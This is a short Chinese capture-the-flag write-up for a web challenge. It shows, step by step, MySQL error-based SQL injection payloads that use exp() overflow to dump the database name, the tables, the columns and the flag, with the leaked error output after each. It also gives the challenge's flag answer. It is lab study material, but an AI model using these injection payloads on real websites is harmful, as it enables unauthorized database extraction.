http://ctf5.shiyanbar.com/web/index_3.php
这道题的解法是来自简书的大佬,第一次遇到exp溢出故此记录,学习学习
DB:
?id='or exp(~(Select * From (select database())x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'web1' from dual)))'
DB: web1
TB:
?id='or exp(~(Select * From (select group_concat(table_name) from information_schema.tables where table_schema=database())x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'flag,web_1' from dual)))'
TB: flag,web_1
Col:
?id='or exp(~(Select * From (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag')x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'flag,id' from dual)))'
Col: flag,id
DUMP:
?id='or exp(~(Select * From (select flag from flag)x)) %23
页面结果
DOUBLE value is out of range in 'exp(~((select 'flag{Y0u_@r3_5O_dAmn_90Od}' from dual)))'
flag: flag{Y0u_@r3_5O_dAmn_90Od}